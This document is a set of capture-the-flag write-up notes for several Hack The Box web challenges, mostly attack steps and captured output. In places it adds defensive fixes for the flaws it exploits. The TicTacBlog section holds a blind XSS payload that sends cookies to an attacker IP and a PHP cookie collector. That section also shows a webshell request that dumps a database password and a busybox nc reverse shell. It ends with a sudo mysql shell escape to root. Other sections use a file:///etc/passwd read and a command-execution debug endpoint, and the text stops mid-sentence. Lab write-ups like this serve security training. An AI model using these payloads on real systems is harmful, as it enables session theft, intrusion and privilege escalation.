        "CreationDate": 1757696304,
        "Enabled": true,
        "KeyUsage": "ENCRYPT_DECRYPT",
        "KeyState": "Enabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
        "EncryptionAlgorithms": [
            "SYMMETRIC_DEFAULT"
        ]
    }
}
 
 
=== Describing Key: 7e70a32c-b383-4c59-be2c-2825ab25f7d3 ===
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "7e70a32c-b383-4c59-be2c-2825ab25f7d3",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/7e70a32c-b383-4c59-be2c-2825ab25f7d3",
        "CreationDate": 1757696308,
        "Enabled": true,
        "KeyUsage": "ENCRYPT_DECRYPT",
        "KeyState": "Enabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "RSA_4096",
        "EncryptionAlgorithms": [
            "RSAES_OAEP_SHA_1",
            "RSAES_OAEP_SHA_256"
        ]
    }
}
 
 
=== Describing Key: 94323941-4b22-4038-b9c3-4a9c072df027 ===
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "94323941-4b22-4038-b9c3-4a9c072df027",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/94323941-4b22-4038-b9c3-4a9c072df027",
        "CreationDate": 1757696305,
        "Enabled": true,
        "KeyUsage": "SIGN_VERIFY",
        "KeyState": "Enabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "RSA_4096",
        "SigningAlgorithms": [
            "RSASSA_PSS_SHA_256",
            "RSASSA_PSS_SHA_384",
            "RSASSA_PSS_SHA_512",
            "RSASSA_PKCS1_V1_5_SHA_256",
            "RSASSA_PKCS1_V1_5_SHA_384",
            "RSASSA_PKCS1_V1_5_SHA_512"
        ]
    }
}
 
 
=== Describing Key: aa0fa588-9739-4cf2-b822-506368268832 ===
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "aa0fa588-9739-4cf2-b822-506368268832",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/aa0fa588-9739-4cf2-b822-506368268832",
        "CreationDate": 1757696311,
        "Enabled": true,
        "KeyUsage": "SIGN_VERIFY",
        "KeyState": "Enabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "RSA_4096",
        "SigningAlgorithms": [
            "RSASSA_PSS_SHA_256",
            "RSASSA_PSS_SHA_384",
            "RSASSA_PSS_SHA_512",
            "RSASSA_PKCS1_V1_5_SHA_256",
            "RSASSA_PKCS1_V1_5_SHA_384",
            "RSASSA_PKCS1_V1_5_SHA_512"
        ]
    }
}
 
 
=== Describing Key: b2374455-700a-4945-94c8-59b92fcc746b ===
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "b2374455-700a-4945-94c8-59b92fcc746b",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/b2374455-700a-4945-94c8-59b92fcc746b",
        "CreationDate": 1757696304,
        "Enabled": true,
        "KeyUsage": "ENCRYPT_DECRYPT",
        "KeyState": "Enabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
        "EncryptionAlgorithms": [
            "SYMMETRIC_DEFAULT"
        ]
    }
}
 
 
=== Describing Key: cebde087-568f-49cc-b1ea-bb591bf1922c ===
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "cebde087-568f-49cc-b1ea-bb591bf1922c",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/cebde087-568f-49cc-b1ea-bb591bf1922c",
        "CreationDate": 1757696304,
        "Enabled": true,
        "KeyUsage": "ENCRYPT_DECRYPT",
        "KeyState": "Enabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
        "EncryptionAlgorithms": [
            "SYMMETRIC_DEFAULT"
        ]
    }
}
 
 
=== Describing Key: d40174d2-5442-4cd8-b115-2a3736ca597c ===
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "d40174d2-5442-4cd8-b115-2a3736ca597c",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/d40174d2-5442-4cd8-b115-2a3736ca597c",
        "CreationDate": 1624355046,
        "Enabled": true,
        "Description": "test key 123",
        "KeyUsage": "ENCRYPT_DECRYPT",
        "KeyState": "Enabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
        "EncryptionAlgorithms": [
            "SYMMETRIC_DEFAULT"
        ]
    }
}
 
 
=== Describing Key: e7c264a6-c849-40e2-9f46-70f54cfa4016 ===
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "e7c264a6-c849-40e2-9f46-70f54cfa4016",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/e7c264a6-c849-40e2-9f46-70f54cfa4016",
        "CreationDate": 1757696308,
        "Enabled": true,
        "KeyUsage": "ENCRYPT_DECRYPT",
        "KeyState": "Enabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
        "EncryptionAlgorithms": [
            "SYMMETRIC_DEFAULT"
        ]
    }
}
sh
aws kms get-key-policy --key-id d40174d2-5442-4cd8-b115-2a3736ca597c --policy-name default --endpoint-url http://cloud.htb
 
{
    "Policy": "policy1"
}
 
sh
aws kms create-key --endpoint-url http://cloud.htb --description "Test decryption key" --key-usage ENCRYPT_DECRYPT
 
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "77c8e031-6c1b-4779-a5ef-3e30de063c05",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/77c8e031-6c1b-4779-a5ef-3e30de063c05",
        "CreationDate": 1757713243,
        "Enabled": true,
        "Description": "Test decryption key",
        "KeyUsage": "ENCRYPT_DECRYPT",
        "KeyState": "Enabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
        "EncryptionAlgorithms": [
            "SYMMETRIC_DEFAULT"
        ]
    }
}
 

CatchEmAll

Your one-stop resource to find which city you can find your favorite pokemon to catch on! Go catch 'em all! Note: The remote instance might take a few minutes to spawn. Please be patient.

sh
cat index.js
const express        = require('express');
const { execSync }   = require('child_process');
const router         = express.Router({caseSensitive: true});
 
const isLocalhost = req => ((req.ip == '127.0.0.1' && req.headers.host == '127.0.0.1:1337') ? 0 : 1);
const response = data => ({ message: data });
let db;
 
router.get('/', (req, res) => {
	return res.render('index.html');
});
 
router.post('/api/catch', async (req, res) => {
	const { pokemon } = req.body;
 
    if (pokemon) {
        return db.whereToCatch(pokemon)
            .then(rows => {
                return res.json(rows);
            })
            .catch(e => {
                console.log(e);
                return res.status(500).send(response(e.toString()));
            })
    }
	return res.status(500).send(response('Missing parameters!'));
});
 
router.get('/debug', async (req, res) => {
    if (!isLocalhost(req)) return res.status(500).send('Debugging is disallowed public access');
 
    const { cmd, secret } = req.query;
 
    if (! secret === process.env.DEBUG_SECRET ) return res.status(500).send('Unauthorized');
 
    if (cmd) {
        try {
            const cmdExec = execSync(cmd);
            return res.json({cmd, output: cmdExec.toString()});
        }
        catch (e) {
            return res.json({cmd, output: e.stderr.toString()});
        }
    }
 
	return res.status(500).send(response('Missing required parameters'));
});
 
module.exports = (database) => {
	db = database;
	return router;
}

Two mistakes in the /debug handler make it reachable by anyone. isLocalhost returns 0 for a local request and 1 for any other, so `!isLocalhost(req)` rejects exactly the local requests and lets remote ones through. And `! secret === process.env.DEBUG_SECRET` parses as `(!secret) === process.env.DEBUG_SECRET`, a boolean compared with a string, which is never true, so the secret check never rejects anything. Whatever arrives in cmd goes straight to execSync.
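The two guards from /debug, as written in index.js above and in a corrected form, as an added example (not the challenge's code): the request objects carry only the fields the handler reads, and the secret values are made up.

```javascript
// Added example, not the challenge's own code: the two predicate bugs in the
// /debug handler, next to corrected versions. `req` is a plain object with the
// fields the handler reads (req.ip and req.headers.host); requests and secrets
// used with these functions are constructed.

// As written in the handler: 0 for a local request, 1 otherwise. The guard
// `if (!isLocalhost(req))` therefore rejects exactly the local requests and
// lets every remote one through.
const isLocalhostBroken = req =>
  ((req.ip == '127.0.0.1' && req.headers.host == '127.0.0.1:1337') ? 0 : 1);

// Corrected: a boolean that is true only for a loopback request carrying the
// expected Host header.
const isLocalhostFixed = req =>
  req.ip === '127.0.0.1' && req.headers.host === '127.0.0.1:1337';

// As written: `! secret === env` parses as `(!secret) === env`. A boolean is
// never strictly equal to a string (or to undefined when the variable is unset),
// so this is always false and the "Unauthorized" branch is unreachable.
const secretRejectedBroken = (secret, env) => (! secret === env);

// Corrected: reject when no secret was sent, when none is configured, or when
// they differ. Every byte is compared, so a timing side channel learns at most
// the length.
const secretRejectedFixed = (secret, env) => {
  if (typeof secret !== 'string' || typeof env !== 'string' || env.length === 0) return true;
  if (secret.length !== env.length) return true;
  let diff = 0;
  for (let i = 0; i < env.length; i++) diff |= secret.charCodeAt(i) ^ env.charCodeAt(i);
  return diff !== 0;
};

// Would /debug run `cmd` for this request? Mirrors the handler's two guards,
// with `fixed` selecting the corrected predicates.
function debugAllowed(req, secret, env, fixed) {
  const notLocal = fixed ? !isLocalhostFixed(req) : !isLocalhostBroken(req);
  if (notLocal) return false;       // 'Debugging is disallowed public access'
  const badSecret = fixed ? secretRejectedFixed(secret, env) : secretRejectedBroken(secret, env);
  if (badSecret) return false;      // 'Unauthorized'
  return true;                      // execSync(cmd) would run here
}
```

With the broken predicates a remote request with no secret at all is allowed and a local request with the right secret is refused; the fixed pair also treats an unset DEBUG_SECRET as "reject", not as "no check".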

sh
HTB{0n3_1nj3c710n_t0_c4tch_3m_4ll!_027f1f382710e5960f04c6803edc6796}
The renderer fetches Markdown image sources itself, so a file:// source comes back inlined as a base64 data: URI in the rendered HTML:

md
![Read File](file:///etc/passwd)
html
<!DOCTYPE html><html><head>
<meta charset="utf-8">
</head>
<body>
<p><img src="data:image/svg+xml;base64 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" alt="Read File"></p>
<p><img src="http://127.0.0.1:8000/api/dev?x-api-key=934caf98..." alt="Debug Endpoint"></p>
 
</body></html>
sh
echo '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' | base64 -d
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash
 

Self

After multiple conversations, our dev team came up with a status monitoring system which does health checks for crucial components in our infrastructure. It has passed our QA but we doubt that it is secure. Can you help ?

  • add to /etc/hosts
sh
10.129.199.27 cloud.htb s3.cloud.htb
sh
aws s3 ls s3://assets/ --endpoint-url http://s3.cloud.htb --recursive
 
2025-09-12 12:06:02         46 flag.txt
sh
aws s3 cp s3://assets/flag.txt ./ --endpoint-url http://s3.cloud.htb
 
download: s3://assets/flag.txt to ./flag.txt
sh
cat flag.txt
HTB{m3t4_4cc3ss_1s_tr1cky_s0m3t1m3s_df23g!!!}

TicTacBlog

blind xss

script.js

js
new Image().src='http://10.10.14.44/index.php?c='+document.cookie

index.php

php
<?php
// Cookie collector for the blind XSS payload: each pair from document.cookie
// arrives in ?c= and is appended to cookies.txt with the victim's address.
if (isset($_GET['c'])) {
    $file = fopen("cookies.txt", "a+");
    foreach (explode(";", $_GET['c']) as $value) {
        $cookie = urldecode(trim($value));
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
    }
    fclose($file);
}
?>
  • start listener
sh
sudo php -S 0.0.0.0:80

try

txt
"><script src=http://10.10.14.44/script.js></script>

or

txt
<script src=http://10.10.14.44/script.js></script>

sh
sudo php -S 0.0.0.0:80
[Thu Sep 11 21:47:21 2025] PHP 8.2.28 Development Server (http://0.0.0.0:80) started
[Thu Sep 11 21:48:41 2025] 10.129.199.167:55564 Accepted
[Thu Sep 11 21:48:41 2025] 10.129.199.167:55564 [200]: GET /script.js
[Thu Sep 11 21:48:41 2025] 10.129.199.167:55564 Closing
[Thu Sep 11 21:48:41 2025] 10.129.199.167:55566 Accepted
[Thu Sep 11 21:48:41 2025] 10.129.199.167:55566 [200]: GET /index.php?c=PHPSESSID=gc75e87d7i5t0vavg791l4mhap
[Thu Sep 11 21:48:41 2025] 10.129.199.167:55566 Closing
[Thu Sep 11 21:49:17 2025] 10.129.199.167:55636 Accepted
[Thu Sep 11 21:49:17 2025] 10.129.199.167:55636 [200]: GET /script.js
[Thu Sep 11 21:49:17 2025] 10.129.199.167:55636 Closing
[Thu Sep 11 21:49:17 2025] 10.129.199.167:55638 Accepted
[Thu Sep 11 21:49:17 2025] 10.129.199.167:55638 [200]: GET /index.php?c=PHPSESSID=gc75e87d7i5t0vavg791l4mhap
[Thu Sep 11 21:49:17 2025] 10.129.199.167:55638 Closing
 

Reusing the stolen PHPSESSID, a PHP webshell placed through the image upload reads the database config:

http
GET /imgupload/shell.php?cmd=cat+/var/www/html/config.php HTTP/1.1
Host: 10.129.199.167
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=gc75e87d7i5t0vavg791l4mhap
Upgrade-Insecure-Requests: 1
Priority: u=0, i
 
 
php
<?php
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'blog');
define('DB_PASSWORD', 'applepies4breakfast');
define('DB_NAME', 'blog');
 
$conn = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
 if($conn === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>
 

rev shell

http
GET /imgupload/shell.php?cmd=busybox+nc+10.10.14.44+1234+-e+sh HTTP/1.1
Host: 10.129.199.167
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=gc75e87d7i5t0vavg791l4mhap
Upgrade-Insecure-Requests: 1
Priority: u=0, i
sh
rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.44] from (UNKNOWN) [10.129.199.167] 37472
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
sh
www-data@tictacblog:/var/www/html$ netstat -tunlp
netstat -tunlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:46953         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:32789         0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 0.0.0.0:68              0.0.0.0:*                           - 
sh
mysql -u blog -papplepies4breakfast -h 127.0.0.1
sh
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| blog               |
| information_schema |
+--------------------+
2 rows in set (0.001 sec)
sh
MariaDB [(none)]> use blog;
use blog;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
MariaDB [blog]> show tables;
show tables;
+----------------+
| Tables_in_blog |
+----------------+
| users          |
+----------------+
1 row in set (0.000 sec)
 
MariaDB [blog]> select * from users;
select * from users;
+----+----------------------+--------------------------------------------------------------+---------------------+
| id | username             | password                                                     | created_at          |
+----+----------------------+--------------------------------------------------------------+---------------------+
|  3 | admin@tictacblog.htb | $2y$10$FJIn7nSLFYQ67QOmo/8hYuvi6jUDP0MToRNpHUptOGE9smbDYkUym | 2021-08-12 07:33:57 |
+----+----------------------+--------------------------------------------------------------+---------------------+
1 row in set (0.001 sec)
sh
╔══════════╣ Active Ports
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:46953         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:32789         0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22    
sh
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wget
 
╔══════════╣ Installed Compilers
ii  g++                           4:8.3.0-1                    amd64        GNU C++ compiler
ii  g++-8                         8.3.0-6                      amd64        GNU C++ compiler
ii  gcc                           4:8.3.0-1                    amd64        GNU C compiler
ii  gcc-8                         8.3.0-6                      amd64        GNU C compiler
/usr/bin/gcc
 
╔══════════╣ MySQL version
mysql  Ver 15.1 Distrib 10.3.29-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
 

password reuse

sh
www-data@tictacblog:/home$ su anthony
su anthony
Password: applepies4breakfast

user.txt

sh
anthony@tictacblog:~$ cat user.txt
cat user.txt
HTB{P0lly_w4nTs_s0m3_co0k13s}

priv esc

sh
anthony@tictacblog:~$ sudo -l
sudo -l
[sudo] password for anthony: applepies4breakfast
 
Matching Defaults entries for anthony on tictacblog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
User anthony may run the following commands on tictacblog:
    (ALL : ALL) /usr/bin/mysql
 
sh
anthony@tictacblog:~$ sudo mysql -e '\! /bin/sh'
 
sudo mysql -e '\! /bin/sh'
[sudo] password for anthony: applepies4breakfast
 
sh
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
HTB{5UD0_p3rMisSi0ns_R_d4ng3r0us}

Cursed Scrolls

Please check the note.md file first for more information. The Citadel Defense System stands as the last line of protection, but whispers of an ancient curse loom over its core. Mysterious scrolls hold secrets that could unravel its defenses, while unseen forces seek to exploit its weaknesses. As a lone investigator, you must navigate cryptic mechanisms, uncover hidden flaws, and restore the Citadel’s integrity before the curse takes hold. Will you break the spell or fall victim to the unseen dangers within?

Space Uber

Please check the note.md file first for more information. Morty’s interdimensional ride-sharing startup seemed like a brilliant idea—until passengers started traveling for free. A hidden flaw in the system allows unauthorized access, letting sneaky users manipulate ride bookings and bypass payments. With profits plummeting and Rick unimpressed, Morty needs your help to fix the vulnerability. Can you analyze the system, secure the API, and ensure only legitimate rides are processed? The future of Space Uber—and Morty’s entrepreneurial dreams—rests in your hands!

PageOneHTML

Our employees needed a Markdown to HTML converter that will also directly embed all media in the HTML for offline portability. Since this is a public-facing application, we want you to take a look at it and make sure it is secure.

sh
![Read File](file:///etc/passwd)
sh
echo 'cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCl9hcHQ6eDoxMDA6NjU1MzQ6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpub2RlOng6MTAwMDoxMDAwOjovaG9tZS9ub2RlOi9iaW4vYmFzaAo=' | base64 -d
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash
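The converter above fetched a `file:` URL from an image reference and embedded the result as base64, exactly as it would a remote image. As an added example (not PageOneHTML's code, whose source is not on this page; written in PHP to match the rest of this writeup's code), this is the allowlist check an offline-embedding converter would run on every media URL before fetching it; `is_embeddable_media_url()` is a hypothetical helper and the sample URLs are constructed.

```php
<?php
// Added example, not PageOneHTML's code: reject any media URL that is not an
// absolute http(s) URL pointing at a public address. The page's payload
// ![Read File](file:///etc/passwd) fails the very first check.
function is_embeddable_media_url(string $url): bool
{
    $parts = parse_url($url);
    // file:///etc/passwd parses with scheme "file" and no host at all.
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;                           // file:, data:, ftp:, php:, ...
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false;                           // http://trusted@evil confusion
    }
    $host = strtolower(trim($parts['host'], '[]'));
    // Resolve the host and refuse loopback, link-local (cloud metadata) and
    // RFC 1918 targets, so the converter cannot be aimed at localhost services
    // either. gethostbynamel() is IPv4-only; a production check would also
    // resolve AAAA records with dns_get_record().
    $ips = filter_var($host, FILTER_VALIDATE_IP) !== false
        ? [$host]
        : (gethostbynamel($host) ?: []);
    if ($ips === []) {
        return false;                           // unresolvable host
    }
    foreach ($ips as $ip) {
        $public = filter_var($ip, FILTER_VALIDATE_IP,
            FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
        if ($public === false) {
            return false;
        }
    }
    return true;
}

// Constructed inputs: the page's payload, two neighbours that must also be
// refused, and one literal documentation-range (203.0.113.0/24) address that
// needs no DNS and is accepted.
foreach (['file:///etc/passwd', 'http://127.0.0.1:8080/x.png',
          'data:image/png;base64,AAAA', 'https://203.0.113.10/logo.png'] as $u) {
    printf("%-36s %s\n", $u, is_embeddable_media_url($u) ? 'fetch' : 'reject');
}
```

Resolving here and letting the HTTP client resolve again later leaves a DNS-rebinding window; pin the fetch to the address that passed the check and re-run the check on every redirect.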
 

HalCrypto

Meet HalCrypto, the decentralized cryptocurrency that provides you the liberty to exchange value without intermediaries and translates to greater control of funds with lower fees. Our developers have worked very hard to make the platform secure. We want you to take a look and see if you can log in as the admin.

Valley Forums

Hill Valley has filed a complaint that someone hijacked their forums website, can you take a look and identify the culprit?

sh
<script src=http://10.10.14.44/script.js></script>
sh
%3Cscript%20src=http://10.10.14.44/script.js%3E%3C/script%3E

IOI SaveData

To help Art3mis escape from the IOI loyalty center, Parzival and Aech need to hack into Sorrento's computer. They have discovered that IOI developed an exploit that lets them arbitrarily change the OASIS profile data of individual players. Sorrento has left the web interface for that profile editor exposed in his home network. Can you take a look and see if you can get inside?

Council of Ricks

Please check the note.md file first for more information. The Council of Ricks ID System was meant to bring order to the multiverse, but its outdated infrastructure has left it exposed. A flawed communication protocol and unchecked access threaten its integrity, allowing hidden threats to lurk within. With security gaps in its authentication and data processing, the system is on the brink of collapse. Can you analyze the vulnerabilities, patch the flaws, and reinforce its defenses before chaos spreads across realities? The fate of the Council rests in your hands!

sh
HTB{xX3_tHRe4t_n3veR_uSe_eNts!!_a8bb9b87d9ef599588ff5eb577856977}
login.php
<?php
include 'db.php';

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $rawPostData = file_get_contents('php://input');
    libxml_disable_entity_loader(true);
    $xml = simplexml_load_string($rawPostData);

    $username = (string) $xml->username ?? '';
    $password = (string) $xml->password ?? '';

    // Check the database for the user
    $stmt = $pdo->prepare("SELECT * FROM users WHERE username = :username LIMIT 1");
    $stmt->bindParam(':username', $username, PDO::PARAM_STR);
    $stmt->execute();
    $user = $stmt->fetch(PDO::FETCH_ASSOC);

    // If user exists and password matches
    if ($user && password_verify($password, $user['password'])) {
        session_start();
        $_SESSION['user_id'] = $user['id'];
        $_SESSION['username'] = $user['username'];
        header('Location: dashboard.php');
        exit;
    }

    $error = "Invalid username or password.";
}
?>

add-rick.php
<?php
include 'db.php';

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $rawPostData = file_get_contents('php://input');
    libxml_disable_entity_loader(true);
    $xml = simplexml_load_string($rawPostData);

    if ($xml === false) {
        die("Invalid XML data");
    }
    $rick_id = (string) $xml->rick_id ?? '';
    $rating = (string) $xml->rating ?? '';
    $description = (string) $xml->description ?? '';

    $insertQuery = "INSERT INTO ricks (rick_id, rating, description) VALUES (:rick_id, :rating, :description)";
    $stmt = $pdo->prepare($insertQuery);
    $stmt->bindParam(':rick_id', $rick_id, PDO::PARAM_STR);
    $stmt->bindParam(':rating', $rating, PDO::PARAM_STR);
    $stmt->bindParam(':description', $description, PDO::PARAM_STR);

    if (!$stmt->execute()) {
        die("Failed to add Rick to database!");
    }
}
?>
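Both login.php and add-rick.php hand the raw POST body to `simplexml_load_string()` and rely on a single `libxml_disable_entity_loader()` call, which is deprecated since PHP 8.0. As an added example (not the challenge's code), this is one shared intake routine both handlers could call instead; `parse_untrusted_xml()` and `xml_field()` are hypothetical helpers, the field names are the page's own, and the two sample documents are constructed.

```php
<?php
// Added example, not the challenge's code: hardened XML intake for the
// login.php / add-rick.php handlers above.
function parse_untrusted_xml(string $raw, int $maxBytes = 65536): ?SimpleXMLElement
{
    if ($raw === '' || strlen($raw) > $maxBytes) {
        return null;                                  // size cap before libxml sees it
    }
    // ENTITY declarations can only live inside a DOCTYPE, so refusing any
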